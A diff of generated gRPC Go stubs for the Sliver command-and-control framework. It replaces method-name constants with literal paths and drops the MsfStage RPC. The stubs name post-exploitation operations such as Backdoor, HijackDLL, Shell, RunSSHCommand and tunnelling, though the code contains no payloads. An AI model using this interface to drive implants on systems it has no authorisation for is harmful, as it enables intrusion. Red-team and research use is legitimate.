@@ -1729,7 +1534,7 @@ func (c *sliverRPCClient) PivotStopListener(ctx context.Context, in *sliverpb.Pi
func (c *sliverRPCClient) PivotSessionListeners(ctx context.Context, in *sliverpb.PivotListenersReq, opts ...grpc.CallOption) (*sliverpb.PivotListeners, error) {
out := new(sliverpb.PivotListeners)
- err := c.cc.Invoke(ctx, SliverRPC_PivotSessionListeners_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/PivotSessionListeners", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1738,7 +1543,7 @@ func (c *sliverRPCClient) PivotSessionListeners(ctx context.Context, in *sliverp
func (c *sliverRPCClient) PivotGraph(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.PivotGraph, error) {
out := new(clientpb.PivotGraph)
- err := c.cc.Invoke(ctx, SliverRPC_PivotGraph_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/PivotGraph", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1747,7 +1552,7 @@ func (c *sliverRPCClient) PivotGraph(ctx context.Context, in *commonpb.Empty, op
func (c *sliverRPCClient) StartService(ctx context.Context, in *sliverpb.StartServiceReq, opts ...grpc.CallOption) (*sliverpb.ServiceInfo, error) {
out := new(sliverpb.ServiceInfo)
- err := c.cc.Invoke(ctx, SliverRPC_StartService_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/StartService", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1756,7 +1561,7 @@ func (c *sliverRPCClient) StartService(ctx context.Context, in *sliverpb.StartSe
func (c *sliverRPCClient) StopService(ctx context.Context, in *sliverpb.StopServiceReq, opts ...grpc.CallOption) (*sliverpb.ServiceInfo, error) {
out := new(sliverpb.ServiceInfo)
- err := c.cc.Invoke(ctx, SliverRPC_StopService_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/StopService", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1765,7 +1570,7 @@ func (c *sliverRPCClient) StopService(ctx context.Context, in *sliverpb.StopServ
func (c *sliverRPCClient) RemoveService(ctx context.Context, in *sliverpb.RemoveServiceReq, opts ...grpc.CallOption) (*sliverpb.ServiceInfo, error) {
out := new(sliverpb.ServiceInfo)
- err := c.cc.Invoke(ctx, SliverRPC_RemoveService_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/RemoveService", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1774,7 +1579,7 @@ func (c *sliverRPCClient) RemoveService(ctx context.Context, in *sliverpb.Remove
func (c *sliverRPCClient) MakeToken(ctx context.Context, in *sliverpb.MakeTokenReq, opts ...grpc.CallOption) (*sliverpb.MakeToken, error) {
out := new(sliverpb.MakeToken)
- err := c.cc.Invoke(ctx, SliverRPC_MakeToken_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/MakeToken", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1783,7 +1588,7 @@ func (c *sliverRPCClient) MakeToken(ctx context.Context, in *sliverpb.MakeTokenR
func (c *sliverRPCClient) GetEnv(ctx context.Context, in *sliverpb.EnvReq, opts ...grpc.CallOption) (*sliverpb.EnvInfo, error) {
out := new(sliverpb.EnvInfo)
- err := c.cc.Invoke(ctx, SliverRPC_GetEnv_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GetEnv", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1792,7 +1597,7 @@ func (c *sliverRPCClient) GetEnv(ctx context.Context, in *sliverpb.EnvReq, opts
func (c *sliverRPCClient) SetEnv(ctx context.Context, in *sliverpb.SetEnvReq, opts ...grpc.CallOption) (*sliverpb.SetEnv, error) {
out := new(sliverpb.SetEnv)
- err := c.cc.Invoke(ctx, SliverRPC_SetEnv_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/SetEnv", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1801,7 +1606,7 @@ func (c *sliverRPCClient) SetEnv(ctx context.Context, in *sliverpb.SetEnvReq, op
func (c *sliverRPCClient) UnsetEnv(ctx context.Context, in *sliverpb.UnsetEnvReq, opts ...grpc.CallOption) (*sliverpb.UnsetEnv, error) {
out := new(sliverpb.UnsetEnv)
- err := c.cc.Invoke(ctx, SliverRPC_UnsetEnv_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/UnsetEnv", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1810,7 +1615,7 @@ func (c *sliverRPCClient) UnsetEnv(ctx context.Context, in *sliverpb.UnsetEnvReq
func (c *sliverRPCClient) Backdoor(ctx context.Context, in *clientpb.BackdoorReq, opts ...grpc.CallOption) (*clientpb.Backdoor, error) {
out := new(clientpb.Backdoor)
- err := c.cc.Invoke(ctx, SliverRPC_Backdoor_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Backdoor", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1819,7 +1624,7 @@ func (c *sliverRPCClient) Backdoor(ctx context.Context, in *clientpb.BackdoorReq
func (c *sliverRPCClient) RegistryRead(ctx context.Context, in *sliverpb.RegistryReadReq, opts ...grpc.CallOption) (*sliverpb.RegistryRead, error) {
out := new(sliverpb.RegistryRead)
- err := c.cc.Invoke(ctx, SliverRPC_RegistryRead_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/RegistryRead", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1828,7 +1633,7 @@ func (c *sliverRPCClient) RegistryRead(ctx context.Context, in *sliverpb.Registr
func (c *sliverRPCClient) RegistryWrite(ctx context.Context, in *sliverpb.RegistryWriteReq, opts ...grpc.CallOption) (*sliverpb.RegistryWrite, error) {
out := new(sliverpb.RegistryWrite)
- err := c.cc.Invoke(ctx, SliverRPC_RegistryWrite_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/RegistryWrite", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1837,7 +1642,7 @@ func (c *sliverRPCClient) RegistryWrite(ctx context.Context, in *sliverpb.Regist
func (c *sliverRPCClient) RegistryCreateKey(ctx context.Context, in *sliverpb.RegistryCreateKeyReq, opts ...grpc.CallOption) (*sliverpb.RegistryCreateKey, error) {
out := new(sliverpb.RegistryCreateKey)
- err := c.cc.Invoke(ctx, SliverRPC_RegistryCreateKey_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/RegistryCreateKey", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1846,7 +1651,7 @@ func (c *sliverRPCClient) RegistryCreateKey(ctx context.Context, in *sliverpb.Re
func (c *sliverRPCClient) RegistryDeleteKey(ctx context.Context, in *sliverpb.RegistryDeleteKeyReq, opts ...grpc.CallOption) (*sliverpb.RegistryDeleteKey, error) {
out := new(sliverpb.RegistryDeleteKey)
- err := c.cc.Invoke(ctx, SliverRPC_RegistryDeleteKey_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/RegistryDeleteKey", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1855,7 +1660,7 @@ func (c *sliverRPCClient) RegistryDeleteKey(ctx context.Context, in *sliverpb.Re
func (c *sliverRPCClient) RegistryListSubKeys(ctx context.Context, in *sliverpb.RegistrySubKeyListReq, opts ...grpc.CallOption) (*sliverpb.RegistrySubKeyList, error) {
out := new(sliverpb.RegistrySubKeyList)
- err := c.cc.Invoke(ctx, SliverRPC_RegistryListSubKeys_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/RegistryListSubKeys", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1864,7 +1669,7 @@ func (c *sliverRPCClient) RegistryListSubKeys(ctx context.Context, in *sliverpb.
func (c *sliverRPCClient) RegistryListValues(ctx context.Context, in *sliverpb.RegistryListValuesReq, opts ...grpc.CallOption) (*sliverpb.RegistryValuesList, error) {
out := new(sliverpb.RegistryValuesList)
- err := c.cc.Invoke(ctx, SliverRPC_RegistryListValues_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/RegistryListValues", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1873,7 +1678,7 @@ func (c *sliverRPCClient) RegistryListValues(ctx context.Context, in *sliverpb.R
func (c *sliverRPCClient) RegistryReadHive(ctx context.Context, in *sliverpb.RegistryReadHiveReq, opts ...grpc.CallOption) (*sliverpb.RegistryReadHive, error) {
out := new(sliverpb.RegistryReadHive)
- err := c.cc.Invoke(ctx, SliverRPC_RegistryReadHive_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/RegistryReadHive", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1882,7 +1687,7 @@ func (c *sliverRPCClient) RegistryReadHive(ctx context.Context, in *sliverpb.Reg
func (c *sliverRPCClient) RunSSHCommand(ctx context.Context, in *sliverpb.SSHCommandReq, opts ...grpc.CallOption) (*sliverpb.SSHCommand, error) {
out := new(sliverpb.SSHCommand)
- err := c.cc.Invoke(ctx, SliverRPC_RunSSHCommand_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/RunSSHCommand", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1891,7 +1696,7 @@ func (c *sliverRPCClient) RunSSHCommand(ctx context.Context, in *sliverpb.SSHCom
func (c *sliverRPCClient) HijackDLL(ctx context.Context, in *clientpb.DllHijackReq, opts ...grpc.CallOption) (*clientpb.DllHijack, error) {
out := new(clientpb.DllHijack)
- err := c.cc.Invoke(ctx, SliverRPC_HijackDLL_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/HijackDLL", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1900,7 +1705,7 @@ func (c *sliverRPCClient) HijackDLL(ctx context.Context, in *clientpb.DllHijackR
func (c *sliverRPCClient) GetPrivs(ctx context.Context, in *sliverpb.GetPrivsReq, opts ...grpc.CallOption) (*sliverpb.GetPrivs, error) {
out := new(sliverpb.GetPrivs)
- err := c.cc.Invoke(ctx, SliverRPC_GetPrivs_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GetPrivs", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1909,7 +1714,7 @@ func (c *sliverRPCClient) GetPrivs(ctx context.Context, in *sliverpb.GetPrivsReq
func (c *sliverRPCClient) StartRportFwdListener(ctx context.Context, in *sliverpb.RportFwdStartListenerReq, opts ...grpc.CallOption) (*sliverpb.RportFwdListener, error) {
out := new(sliverpb.RportFwdListener)
- err := c.cc.Invoke(ctx, SliverRPC_StartRportFwdListener_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/StartRportFwdListener", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1918,7 +1723,7 @@ func (c *sliverRPCClient) StartRportFwdListener(ctx context.Context, in *sliverp
func (c *sliverRPCClient) GetRportFwdListeners(ctx context.Context, in *sliverpb.RportFwdListenersReq, opts ...grpc.CallOption) (*sliverpb.RportFwdListeners, error) {
out := new(sliverpb.RportFwdListeners)
- err := c.cc.Invoke(ctx, SliverRPC_GetRportFwdListeners_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GetRportFwdListeners", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1927,7 +1732,7 @@ func (c *sliverRPCClient) GetRportFwdListeners(ctx context.Context, in *sliverpb
func (c *sliverRPCClient) StopRportFwdListener(ctx context.Context, in *sliverpb.RportFwdStopListenerReq, opts ...grpc.CallOption) (*sliverpb.RportFwdListener, error) {
out := new(sliverpb.RportFwdListener)
- err := c.cc.Invoke(ctx, SliverRPC_StopRportFwdListener_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/StopRportFwdListener", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1936,7 +1741,7 @@ func (c *sliverRPCClient) StopRportFwdListener(ctx context.Context, in *sliverpb
func (c *sliverRPCClient) OpenSession(ctx context.Context, in *sliverpb.OpenSession, opts ...grpc.CallOption) (*sliverpb.OpenSession, error) {
out := new(sliverpb.OpenSession)
- err := c.cc.Invoke(ctx, SliverRPC_OpenSession_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/OpenSession", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1945,7 +1750,7 @@ func (c *sliverRPCClient) OpenSession(ctx context.Context, in *sliverpb.OpenSess
func (c *sliverRPCClient) CloseSession(ctx context.Context, in *sliverpb.CloseSession, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_CloseSession_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/CloseSession", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1954,7 +1759,7 @@ func (c *sliverRPCClient) CloseSession(ctx context.Context, in *sliverpb.CloseSe
func (c *sliverRPCClient) RegisterExtension(ctx context.Context, in *sliverpb.RegisterExtensionReq, opts ...grpc.CallOption) (*sliverpb.RegisterExtension, error) {
out := new(sliverpb.RegisterExtension)
- err := c.cc.Invoke(ctx, SliverRPC_RegisterExtension_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/RegisterExtension", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1963,7 +1768,7 @@ func (c *sliverRPCClient) RegisterExtension(ctx context.Context, in *sliverpb.Re
func (c *sliverRPCClient) CallExtension(ctx context.Context, in *sliverpb.CallExtensionReq, opts ...grpc.CallOption) (*sliverpb.CallExtension, error) {
out := new(sliverpb.CallExtension)
- err := c.cc.Invoke(ctx, SliverRPC_CallExtension_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/CallExtension", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1972,7 +1777,7 @@ func (c *sliverRPCClient) CallExtension(ctx context.Context, in *sliverpb.CallEx
func (c *sliverRPCClient) ListExtensions(ctx context.Context, in *sliverpb.ListExtensionsReq, opts ...grpc.CallOption) (*sliverpb.ListExtensions, error) {
out := new(sliverpb.ListExtensions)
- err := c.cc.Invoke(ctx, SliverRPC_ListExtensions_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/ListExtensions", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1981,7 +1786,7 @@ func (c *sliverRPCClient) ListExtensions(ctx context.Context, in *sliverpb.ListE
func (c *sliverRPCClient) RegisterWasmExtension(ctx context.Context, in *sliverpb.RegisterWasmExtensionReq, opts ...grpc.CallOption) (*sliverpb.RegisterWasmExtension, error) {
out := new(sliverpb.RegisterWasmExtension)
- err := c.cc.Invoke(ctx, SliverRPC_RegisterWasmExtension_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/RegisterWasmExtension", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1990,7 +1795,7 @@ func (c *sliverRPCClient) RegisterWasmExtension(ctx context.Context, in *sliverp
func (c *sliverRPCClient) ListWasmExtensions(ctx context.Context, in *sliverpb.ListWasmExtensionsReq, opts ...grpc.CallOption) (*sliverpb.ListWasmExtensions, error) {
out := new(sliverpb.ListWasmExtensions)
- err := c.cc.Invoke(ctx, SliverRPC_ListWasmExtensions_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/ListWasmExtensions", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1999,7 +1804,7 @@ func (c *sliverRPCClient) ListWasmExtensions(ctx context.Context, in *sliverpb.L
func (c *sliverRPCClient) ExecWasmExtension(ctx context.Context, in *sliverpb.ExecWasmExtensionReq, opts ...grpc.CallOption) (*sliverpb.ExecWasmExtension, error) {
out := new(sliverpb.ExecWasmExtension)
- err := c.cc.Invoke(ctx, SliverRPC_ExecWasmExtension_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/ExecWasmExtension", in, out, opts...)
if err != nil {
return nil, err
}
@@ -2008,7 +1813,7 @@ func (c *sliverRPCClient) ExecWasmExtension(ctx context.Context, in *sliverpb.Ex
func (c *sliverRPCClient) WGStartPortForward(ctx context.Context, in *sliverpb.WGPortForwardStartReq, opts ...grpc.CallOption) (*sliverpb.WGPortForward, error) {
out := new(sliverpb.WGPortForward)
- err := c.cc.Invoke(ctx, SliverRPC_WGStartPortForward_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/WGStartPortForward", in, out, opts...)
if err != nil {
return nil, err
}
@@ -2017,7 +1822,7 @@ func (c *sliverRPCClient) WGStartPortForward(ctx context.Context, in *sliverpb.W
func (c *sliverRPCClient) WGStopPortForward(ctx context.Context, in *sliverpb.WGPortForwardStopReq, opts ...grpc.CallOption) (*sliverpb.WGPortForward, error) {
out := new(sliverpb.WGPortForward)
- err := c.cc.Invoke(ctx, SliverRPC_WGStopPortForward_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/WGStopPortForward", in, out, opts...)
if err != nil {
return nil, err
}
@@ -2026,7 +1831,7 @@ func (c *sliverRPCClient) WGStopPortForward(ctx context.Context, in *sliverpb.WG
func (c *sliverRPCClient) WGStartSocks(ctx context.Context, in *sliverpb.WGSocksStartReq, opts ...grpc.CallOption) (*sliverpb.WGSocks, error) {
out := new(sliverpb.WGSocks)
- err := c.cc.Invoke(ctx, SliverRPC_WGStartSocks_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/WGStartSocks", in, out, opts...)
if err != nil {
return nil, err
}
@@ -2035,7 +1840,7 @@ func (c *sliverRPCClient) WGStartSocks(ctx context.Context, in *sliverpb.WGSocks
func (c *sliverRPCClient) WGStopSocks(ctx context.Context, in *sliverpb.WGSocksStopReq, opts ...grpc.CallOption) (*sliverpb.WGSocks, error) {
out := new(sliverpb.WGSocks)
- err := c.cc.Invoke(ctx, SliverRPC_WGStopSocks_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/WGStopSocks", in, out, opts...)
if err != nil {
return nil, err
}
@@ -2044,7 +1849,7 @@ func (c *sliverRPCClient) WGStopSocks(ctx context.Context, in *sliverpb.WGSocksS
func (c *sliverRPCClient) WGListForwarders(ctx context.Context, in *sliverpb.WGTCPForwardersReq, opts ...grpc.CallOption) (*sliverpb.WGTCPForwarders, error) {
out := new(sliverpb.WGTCPForwarders)
- err := c.cc.Invoke(ctx, SliverRPC_WGListForwarders_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/WGListForwarders", in, out, opts...)
if err != nil {
return nil, err
}
@@ -2053,7 +1858,7 @@ func (c *sliverRPCClient) WGListForwarders(ctx context.Context, in *sliverpb.WGT
func (c *sliverRPCClient) WGListSocksServers(ctx context.Context, in *sliverpb.WGSocksServersReq, opts ...grpc.CallOption) (*sliverpb.WGSocksServers, error) {
out := new(sliverpb.WGSocksServers)
- err := c.cc.Invoke(ctx, SliverRPC_WGListSocksServers_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/WGListSocksServers", in, out, opts...)
if err != nil {
return nil, err
}
@@ -2062,7 +1867,7 @@ func (c *sliverRPCClient) WGListSocksServers(ctx context.Context, in *sliverpb.W
func (c *sliverRPCClient) Shell(ctx context.Context, in *sliverpb.ShellReq, opts ...grpc.CallOption) (*sliverpb.Shell, error) {
out := new(sliverpb.Shell)
- err := c.cc.Invoke(ctx, SliverRPC_Shell_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Shell", in, out, opts...)
if err != nil {
return nil, err
}
@@ -2071,7 +1876,7 @@ func (c *sliverRPCClient) Shell(ctx context.Context, in *sliverpb.ShellReq, opts
func (c *sliverRPCClient) Portfwd(ctx context.Context, in *sliverpb.PortfwdReq, opts ...grpc.CallOption) (*sliverpb.Portfwd, error) {
out := new(sliverpb.Portfwd)
- err := c.cc.Invoke(ctx, SliverRPC_Portfwd_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Portfwd", in, out, opts...)
if err != nil {
return nil, err
}
@@ -2080,7 +1885,7 @@ func (c *sliverRPCClient) Portfwd(ctx context.Context, in *sliverpb.PortfwdReq,
func (c *sliverRPCClient) CreateSocks(ctx context.Context, in *sliverpb.Socks, opts ...grpc.CallOption) (*sliverpb.Socks, error) {
out := new(sliverpb.Socks)
- err := c.cc.Invoke(ctx, SliverRPC_CreateSocks_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/CreateSocks", in, out, opts...)
if err != nil {
return nil, err
}
@@ -2089,7 +1894,7 @@ func (c *sliverRPCClient) CreateSocks(ctx context.Context, in *sliverpb.Socks, o
func (c *sliverRPCClient) CloseSocks(ctx context.Context, in *sliverpb.Socks, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_CloseSocks_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/CloseSocks", in, out, opts...)
if err != nil {
return nil, err
}
@@ -2097,7 +1902,7 @@ func (c *sliverRPCClient) CloseSocks(ctx context.Context, in *sliverpb.Socks, op
}
func (c *sliverRPCClient) SocksProxy(ctx context.Context, opts ...grpc.CallOption) (SliverRPC_SocksProxyClient, error) {
- stream, err := c.cc.NewStream(ctx, &SliverRPC_ServiceDesc.Streams[3], SliverRPC_SocksProxy_FullMethodName, opts...)
+ stream, err := c.cc.NewStream(ctx, &SliverRPC_ServiceDesc.Streams[3], "/rpcpb.SliverRPC/SocksProxy", opts...)
if err != nil {
return nil, err
}
@@ -2129,7 +1934,7 @@ func (x *sliverRPCSocksProxyClient) Recv() (*sliverpb.SocksData, error) {
func (c *sliverRPCClient) CreateTunnel(ctx context.Context, in *sliverpb.Tunnel, opts ...grpc.CallOption) (*sliverpb.Tunnel, error) {
out := new(sliverpb.Tunnel)
- err := c.cc.Invoke(ctx, SliverRPC_CreateTunnel_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/CreateTunnel", in, out, opts...)
if err != nil {
return nil, err
}
@@ -2138,7 +1943,7 @@ func (c *sliverRPCClient) CreateTunnel(ctx context.Context, in *sliverpb.Tunnel,
func (c *sliverRPCClient) CloseTunnel(ctx context.Context, in *sliverpb.Tunnel, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_CloseTunnel_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/CloseTunnel", in, out, opts...)
if err != nil {
return nil, err
}
@@ -2146,7 +1951,7 @@ func (c *sliverRPCClient) CloseTunnel(ctx context.Context, in *sliverpb.Tunnel,
}
func (c *sliverRPCClient) TunnelData(ctx context.Context, opts ...grpc.CallOption) (SliverRPC_TunnelDataClient, error) {
- stream, err := c.cc.NewStream(ctx, &SliverRPC_ServiceDesc.Streams[4], SliverRPC_TunnelData_FullMethodName, opts...)
+ stream, err := c.cc.NewStream(ctx, &SliverRPC_ServiceDesc.Streams[4], "/rpcpb.SliverRPC/TunnelData", opts...)
if err != nil {
return nil, err
}
@@ -2177,7 +1982,7 @@ func (x *sliverRPCTunnelDataClient) Recv() (*sliverpb.TunnelData, error) {
}
func (c *sliverRPCClient) Events(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (SliverRPC_EventsClient, error) {
- stream, err := c.cc.NewStream(ctx, &SliverRPC_ServiceDesc.Streams[5], SliverRPC_Events_FullMethodName, opts...)
+ stream, err := c.cc.NewStream(ctx, &SliverRPC_ServiceDesc.Streams[5], "/rpcpb.SliverRPC/Events", opts...)
if err != nil {
return nil, err
}
@@ -2310,7 +2115,6 @@ type SliverRPCServer interface {
ImplantProfiles(context.Context, *commonpb.Empty) (*clientpb.ImplantProfiles, error)
DeleteImplantProfile(context.Context, *clientpb.DeleteReq) (*commonpb.Empty, error)
SaveImplantProfile(context.Context, *clientpb.ImplantProfile) (*clientpb.ImplantProfile, error)
- MsfStage(context.Context, *clientpb.MsfStagerReq) (*clientpb.MsfStager, error)
ShellcodeRDI(context.Context, *clientpb.ShellcodeRDIReq) (*clientpb.ShellcodeRDI, error)
GetCompiler(context.Context, *commonpb.Empty) (*clientpb.Compiler, error)
ShellcodeEncoder(context.Context, *clientpb.ShellcodeEncodeReq) (*clientpb.ShellcodeEncode, error)
@@ -2668,9 +2472,6 @@ func (UnimplementedSliverRPCServer) DeleteImplantProfile(context.Context, *clien
func (UnimplementedSliverRPCServer) SaveImplantProfile(context.Context, *clientpb.ImplantProfile) (*clientpb.ImplantProfile, error) {
return nil, status.Errorf(codes.Unimplemented, "method SaveImplantProfile not implemented")
}
-func (UnimplementedSliverRPCServer) MsfStage(context.Context, *clientpb.MsfStagerReq) (*clientpb.MsfStager, error) {
- return nil, status.Errorf(codes.Unimplemented, "method MsfStage not implemented")
-}
func (UnimplementedSliverRPCServer) ShellcodeRDI(context.Context, *clientpb.ShellcodeRDIReq) (*clientpb.ShellcodeRDI, error) {
return nil, status.Errorf(codes.Unimplemented, "method ShellcodeRDI not implemented")
}
@@ -3000,7 +2801,7 @@ func _SliverRPC_GetVersion_Handler(srv interface{}, ctx context.Context, dec fun
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GetVersion_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GetVersion",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GetVersion(ctx, req.(*commonpb.Empty))
@@ -3044,7 +2845,7 @@ func _SliverRPC_GetOperators_Handler(srv interface{}, ctx context.Context, dec f
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GetOperators_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GetOperators",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GetOperators(ctx, req.(*commonpb.Empty))
@@ -3062,7 +2863,7 @@ func _SliverRPC_Kill_Handler(srv interface{}, ctx context.Context, dec func(inte
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Kill_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Kill",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Kill(ctx, req.(*sliverpb.KillReq))
@@ -3080,7 +2881,7 @@ func _SliverRPC_Reconfigure_Handler(srv interface{}, ctx context.Context, dec fu
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Reconfigure_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Reconfigure",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Reconfigure(ctx, req.(*sliverpb.ReconfigureReq))
@@ -3098,7 +2899,7 @@ func _SliverRPC_Rename_Handler(srv interface{}, ctx context.Context, dec func(in
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_Rename_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/Rename",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).Rename(ctx, req.(*clientpb.RenameReq))
@@ -3116,7 +2917,7 @@ func _SliverRPC_GetSessions_Handler(srv interface{}, ctx context.Context, dec fu
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_GetSessions_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/GetSessions",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).GetSessions(ctx, req.(*commonpb.Empty))
@@ -3134,7 +2935,7 @@ func _SliverRPC_MonitorStart_Handler(srv interface{}, ctx context.Context, dec f
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_MonitorStart_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/MonitorStart",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).MonitorStart(ctx, req.(*commonpb.Empty))
@@ -3152,7 +2953,7 @@ func _SliverRPC_MonitorStop_Handler(srv interface{}, ctx context.Context, dec fu
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_MonitorStop_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/MonitorStop",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(SliverRPCServer).MonitorStop(ctx, req.(*commonpb.Empty))
@@ -3170,7 +2971,7 @@ func _SliverRPC_MonitorListConfig_Handler(srv interface{}, ctx context.Context,
}
info := &grpc.UnaryServerInfo{
Server: srv,
- FullMethod: SliverRPC_MonitorListConfig_FullMethodName,
+ FullMethod: "/rpcpb.SliverRPC/MonitorListConfig",
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
